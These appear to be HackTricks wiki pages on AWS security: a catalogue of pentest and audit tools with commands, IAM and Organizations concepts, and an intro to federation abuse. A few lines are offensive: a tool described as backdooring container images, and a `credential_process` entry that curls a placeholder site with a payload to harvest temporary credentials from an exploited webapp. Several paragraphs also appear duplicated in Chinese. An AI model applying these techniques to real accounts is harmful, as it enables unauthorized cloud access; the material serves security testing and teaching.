- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **misconfigurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
- Note that pacu **only checks your own privescs paths** (not account wide).
```bash
# Install
## Feel free to use venvs
pacu
> exec iam__enum_permissions # Get permissions
> exec iam__privesc_scan # List privileged permissions
```
- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ending in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
```bash
# Install
pip install principalmapper
pmapper --profile dev query 'preset privesc *' # Get privescs with admins
pmapper --profile dev orgs create
pmapper --profile dev orgs display
```
- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
It will show you potentially **over-privileged** customer, inline and AWS **policies** and which **principals have access to them**. (It checks not only for privesc but also other kinds of interesting permissions; recommended to use.)
```bash
# Install
pip install cloudsplaining
cloudsplaining download --profile dev
# Analyze the IAM policies
cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
```
- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
### Audit
- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
```bash
./index.js --csv=file.csv --console=table --config ./config.js
# Compliance options: --compliance {hipaa,cis,cis1,cis2,pci}
## use "cis" for cis level 1 and 2
```
- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
```bash
# Install python3, jq and git
# Install
prowler -v
prowler <provider>
prowler aws --profile custom-profile [-M csv json json-asff html]
```
- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It's an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
```bash
cloudfox aws --profile [profile-name] all-checks
```
- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
```bash
# Install
virtualenv -p python3 venv
scout --help
# Get info
scout aws -p dev
```
- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
### Constant Audit
- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
## DEBUG: Capture AWS cli requests
```bash
# Set proxy
export HTTP_PROXY=http://localhost:8080
export AWS_CA_BUNDLE=~/Downloads/certificate.pem
# Run aws cli normally trusting burp cert
aws ...
```
## References
- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
- [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
{{#include ../../banners/hacktricks-training.md}}

# AWS - Basic Information
{{#include ../../../banners/hacktricks-training.md}}
## Organization Hierarchy
![](<../../../images/image (151).png>)
### Accounts
AWS 中,有一个 **根账户**,它是您 **组织中所有账户的父容器**。然而,您不需要使用该账户来部署资源,您可以创建 **其他账户以将不同的 AWS** 基础设施分开。
In AWS, there is a **root account**, which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
**安全** 的角度来看,这非常有趣,因为 **一个账户无法访问其他账户的资源**(除非专门创建了桥接),因此您可以在部署之间创建边界。
This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
- Create accounts in the organization
- Invite other existing accounts to the organization
- Remove accounts from the organization
- Manage invitations
- Apply policies to entities (roots, OUs, or accounts) within the organization
- Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
- It's possible to login as the root user using the email and password used to create this root account/organization.
The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
- Member accounts **must use a valid email address** and can have a **name**; in general they won't be able to manage the billing (but they might be given access to it).
```
aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
```
### **Organization Units**
Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
```bash
# You can get the root id from aws organizations list-roots
aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
```
### Service Control Policy (SCP)
A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach an SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
> [!WARNING]
> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
SCP examples:
- Deny the root account entirely
- Only allow specific regions
- Only allow white-listed services
- Deny GuardDuty, CloudTrail, and S3 Public Block Access from being disabled
- Deny security/incident response roles from being deleted or modified
- Deny backups from being deleted
- Deny creating IAM users and access keys
Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
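For instance, a minimal illustrative SCP (a sketch in the style of those examples, not an official AWS sample) that prevents principals in affected accounts (including root) from tampering with CloudTrail:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyCloudTrailTampering",
      "Effect": "Deny",
      "Action": [
        "cloudtrail:StopLogging",
        "cloudtrail:DeleteTrail",
        "cloudtrail:UpdateTrail"
      ],
      "Resource": "*"
    }
  ]
}
```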
### Resource Control Policy (RCP)
A **resource control policy (RCP)** is a policy that defines the **maximum permissions for resources within your AWS organization**. RCPs are similar to IAM policies in syntax but **dont grant permissions**—they only cap the permissions that can be applied to resources by other policies. When you attach an RCP to your organization root, an organizational unit (OU), or an account, the RCP limits resource permissions across all resources in the affected scope.
This is the ONLY way to ensure that **resources cannot exceed predefined access levels**—even if an identity-based or resource-based policy is too permissive. The only way to bypass these limits is to also modify the RCP configured by your organization's management account.
> [!WARNING]
> RCPs only restrict the permissions that resources can have. They dont directly control what principals can do. For example, if an RCP denies external access to an S3 bucket, it ensures that the buckets permissions never allow actions beyond the set limit—even if a resource-based policy is misconfigured.
RCP examples:
- Restrict S3 buckets so they can only be accessed by principals within your organization
- Limit KMS key usage to only allow operations from trusted organizational accounts
- Cap permissions on SQS queues to prevent unauthorized modifications
- Enforce access boundaries on Secrets Manager secrets to protect sensitive data
[AWS Organizations Resource Control Policies documentation](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_rcps.html) 中查找示例。
Find examples in [AWS Organizations Resource Control Policies documentation](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_rcps.html)
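As an illustration, an RCP in the style of the documented examples (the org ID is a placeholder) that denies S3 access to principals outside the organization while still allowing AWS service principals:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "EnforceOrgOnlyS3Access",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": "*",
      "Condition": {
        "StringNotEqualsIfExists": {
          "aws:PrincipalOrgID": "o-exampleorgid"
        },
        "BoolIfExists": {
          "aws:PrincipalIsAWSService": "false"
        }
      }
    }
  ]
}
```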
### ARN
**Amazon Resource Name** is the **unique name** every resource inside AWS has; it's composed like this:
```
arn:partition:service:region:account-id:resource-type/resource-id
arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
```
Note that there are 4 partitions in AWS but only 3 ways to call them:
- AWS Standard: `aws`
- AWS China: `aws-cn`
- AWS US public Internet (GovCloud): `aws-us-gov`
- AWS Secret (US Classified): `aws`
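As a worked example, an ARN can be split into its components with plain shell (the last variable absorbs the whole resource part, which may itself contain `/` or further `:`):

```bash
ARN="arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env"

# Split on ':'; read assigns the remainder to the last variable (the resource)
IFS=':' read -r _ PARTITION SERVICE REGION ACCOUNT RESOURCE <<EOF
$ARN
EOF
echo "partition=$PARTITION service=$SERVICE region=$REGION account=$ACCOUNT resource=$RESOURCE"
```

This is handy when triaging lists of ARNs, e.g. to quickly group them by account or service.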
## IAM - Identity and Access Management
IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
- **Access Control** - The method and process of how access is granted to a secure resource
IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) <a href="#id_root" id="id_root"></a>
When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
Note that a new **admin user** will have **fewer permissions than the root user**.
From a security point of view, it's recommended to create other users and avoid using this one.
### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) <a href="#id_iam-users" id="id_iam-users"></a>
An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
Users can have **MFA enabled to login** through the console. API tokens of MFA-enabled users aren't protected by MFA. If you want to **restrict the access of a user's API keys using MFA** you need to indicate in the policy that MFA needs to be present in order to perform certain actions (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
#### CLI
- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
Whenever you need to **change the Access Key** this is the process you should follow:\
_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
### MFA - Multi Factor Authentication
It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
You can use a **free virtual application or a physical device**. Apps like Google Authenticator can be used for free to activate MFA in AWS.
Policies with MFA conditions can be attached to the following:
- An IAM user or group
- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
- The trust policy of an IAM role that can be assumed by a user
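As a sketch, such a condition is usually expressed with the `aws:MultiFactorAuthPresent` key; the statement below (a common pattern, shown here with a hypothetical `Sid`) denies everything when no MFA was used for authentication:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyAllIfNoMFA",
      "Effect": "Deny",
      "Action": "*",
      "Resource": "*",
      "Condition": {
        "BoolIfExists": { "aws:MultiFactorAuthPresent": "false" }
      }
    }
  ]
}
```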
If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
Note that **`AssumeRole` credentials don't contain this information**.
```bash
aws sts get-session-token --serial-number <arn_device> --token-code <code>
```
As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) <a href="#id_iam-groups" id="id_iam-groups"></a>
An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
Here are some important characteristics of user groups:
- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
- **User groups can't be nested**; they can contain only users, not other user groups.
- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) <a href="#id_iam-roles" id="id_iam-roles"></a>
An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM.
An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**.
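For illustration (the account ID and user name are placeholders), a minimal trust policy letting one specific IAM user assume the role could look like:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::123456789012:user/alice" },
      "Action": "sts:AssumeRole"
    }
  ]
}
```

The permissions policy attached to the role then defines, as usual, which actions and resources the assumed sessions can use.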
#### AWS Security Token Service (STS)
AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for:
### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) <a href="#id_temp-creds" id="id_temp-creds"></a>
**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid.
### Policies
#### Policy Permissions
Are used to assign permissions. There are 2 types:
- AWS managed policies (preconfigured by AWS)
- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), use the policy generator (a GUI view that helps you grant and deny permissions), or write your own.
By **default access** is **denied**; access is granted only if an **explicit Allow** has been specified.\
If a **single "Deny" exists, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
```javascript
{
  "Version": "2012-10-17", //Version of the policy
  "Statement": [ //Main element, there can be more than 1 entry in this array
    {
      "Sid": "Stmt32894y234276923", //Unique identifier (optional)
      "Effect": "Allow", //Allow or deny
      "Action": [ //Actions that will be allowed or denied
        "ec2:AttachVolume",
        "ec2:DetachVolume"
      ],
      "Resource": [ //Resource the action and effect will be applied to
        "arn:aws:ec2:*:*:volume/*",
        "arn:aws:ec2:*:*:instance/*"
      ],
      "Condition": { //Optional element that allows to control when the permission will be effective
        "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
      }
    }
  ]
}
```
The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
#### Inline Policies
This kind of policy is **directly assigned** to a user, group or role. It does not appear in the Policies list, and no other identity can use it.\
Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
#### Resource Bucket Policies
These are **policies** that can be defined in **resources**. **Not all AWS resources support them**.
If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed.
### IAM Boundaries
IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions is granted to the user by a **different policy**, the operation will **fail** if he tries to use them.
A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S3 buckets, that's the maximum he can do.
**This**, **SCPs** and **following the least-privilege principle** are the ways to ensure users don't have more permissions than the ones they need.
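A sketch of a boundary policy allowing only S3 read actions (the actions chosen here are illustrative):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": "*"
    }
  ]
}
```

It would be attached with something like `aws iam put-user-permissions-boundary --user-name <user> --permissions-boundary <policy_arn>`; any action outside this set then fails, regardless of the user's other policies.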
### Session Policies
A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has).
This is useful for **security measures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised.
```bash
aws sts assume-role \
    --role-arn <value> \
    --role-session-name <value> \
    [--policy-arns <arn_custom_policy1> <arn_custom_policy2>]
    [--policy <file://policy.json>]
```
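For example, a session policy file passed via `--policy` could scope the session down to reading a single bucket (the bucket name is a placeholder):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::example-bucket",
        "arn:aws:s3:::example-bucket/*"
      ]
    }
  ]
}
```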
Note that by default **AWS might add session policies to sessions** that are going to be generated for other reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services).
Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**.
### Identity Federation
Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\
An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS.
To configure this trust, an **IAM Identity Provider (SAML or OAuth)** is generated that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform accesses AWS, they will be accessing as the mentioned role.
However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other.
<figure><img src="../../../images/image (247).png" alt=""><figcaption></figcaption></figure>
### IAM Identity Center
AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central place** that brings together **administration of users and their access to AWS** accounts and cloud applications.
The login domain is going to be something like `<user_input>.awsapps.com`.
To login users, there are 3 identity sources that can be used:
- Identity Center Directory: Regular AWS users
- Active Directory: Supports different connectors
- External Identity Provider: All users and groups come from an external Identity Provider (IdP)
<figure><img src="../../../images/image (279).png" alt=""><figcaption></figcaption></figure>
In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization.
In order to give an Identity Center user/group access to an account, a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account.
#### AwsSSOInlinePolicy
It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**.
Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean they have the same permissions**.
### Cross Account Trusts and Roles
**A user** (trusting) can create a Cross Account Role with some policies and then **allow another user** (trusted) to **access his account**, but only **with the access indicated in the new role's policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offer two options: providing access between AWS accounts that you own, and providing access between an account that you own and a third-party AWS account.\
It's recommended to **specify the user who is trusted and not put something generic**, because otherwise other authenticated users, like federated users, will also be able to abuse this trust.
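A sketch of such a trust policy scoped to one specific user in the trusted account (the ARN and external ID are placeholders); for third-party accounts an `sts:ExternalId` condition is commonly added to mitigate the confused-deputy problem:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::222222222222:user/trusted-user" },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": { "sts:ExternalId": "unique-external-id" }
      }
    }
  ]
}
```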
### AWS Simple AD
Not supported:
- Trust Relations
- AD Admin Center
- Full PS API support
- AD Recycle Bin
- Group Managed Service Accounts
- Schema Extensions
- No Direct access to OS or Instances
#### Web Federation or OpenID Authentication
The app uses `AssumeRoleWithWebIdentity` to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS.
### Other IAM options
- You can **set a password policy setting** options like minimum length and password requirements.
- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
### IAM ID Prefixes
[**此页面**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids)中,你可以找到根据其性质的键的**IAM ID 前缀**
In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixes** of keys depending on their nature:
| Identifier Code | Description |
| --------------- | ----------------------------------------------------------------------------------------------------------- |
| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ACCA | Context-specific credential |
| AGPA | User group |
| AIDA | IAM user |
| AIPA | Amazon EC2 instance profile |
| AKIA | Access key |
| ANPA | Managed policy |
| ANVA | Version in a managed policy |
| APKA | Public key |
| AROA | Role |
| ASCA | Certificate |
| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
### Recommended permissions to audit accounts
The following privileges grant read access to various metadata:
- `arn:aws:iam::aws:policy/SecurityAudit`
- `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
- `directconnect:DescribeConnections`
- `dynamodb:ListTables`
## Misc
### CLI Authentication
In order for a regular user to authenticate to AWS via the CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
Example of credentials file with more than 1 profile:
```
[default]
aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
[Profile1]
aws_access_key_id = AKIA8YDCu7TGTR356SHYT
aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
region = eu-west-2
```
If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn <role-arn> --role-session-name sessname`) and configure the credentials.
You can use the `~/.aws/config` file to [**indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
A config file example:
```
[profile acc2]
region=eu-west-2
role_arn = <role_arn_to_assume>
role_session_name = <session_name>
source_profile = <profile_with_assume_role>
sts_regional_endpoints = regional
```
With this config file you can then use aws cli like:
```
aws --profile acc2 ...
```
If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
#### Automating temporary credentials
If you are exploiting an application which generates temporary credentials, it can be tedious updating them in your terminal every few minutes when they expire. This can be fixed using a `credential_process` directive in the config file. For example, if you have some vulnerable webapp, you could do:
```toml
[victim]
credential_process = curl -d 'PAYLOAD' https://some-site.com
```
Note that credentials _must_ be returned to STDOUT in the following format:
```json
{
  "Version": 1,
  "AccessKeyId": "an AWS access key",
  "SecretAccessKey": "your AWS secret access key",
  "SessionToken": "the AWS session token for temporary credentials",
  "Expiration": "ISO8601 timestamp when the credentials expire"
}
```
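A minimal sketch of such a helper (the credential values are hard-coded placeholders; a real helper would fetch them from the vulnerable app, e.g. with `curl`, instead):

```bash
#!/usr/bin/env bash
# Hypothetical credential_process helper: prints credentials in the exact
# JSON shape the AWS CLI expects on STDOUT
creds='{
  "Version": 1,
  "AccessKeyId": "ASIAEXAMPLEACCESSKEY",
  "SecretAccessKey": "examplesecretaccesskey",
  "SessionToken": "exampletoken",
  "Expiration": "2030-01-01T00:00:00Z"
}'
echo "$creds"
```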
## References
- [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
- [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)

# AWS - Federation Abuse
{{#include ../../../banners/hacktricks-training.md}}
## SAML
For info about SAML please check:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/saml-attacks/index.html
{{#endref}}
In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key).
## OIDC - Github Actions Abuse
In order to add a GitHub Action as an Identity provider:
1. For _Provider type_, select **OpenID Connect**.
2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
3. Click on _Get thumbprint_ to get the thumbprint of the provider
4. For _Audience_, enter `sts.amazonaws.com`
5. Create a **new role** with the **permissions** the github action needs and a **trust policy** that trusts the provider like:
- ```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:sub": [
"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
],
"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
}
}
}
]
}
```
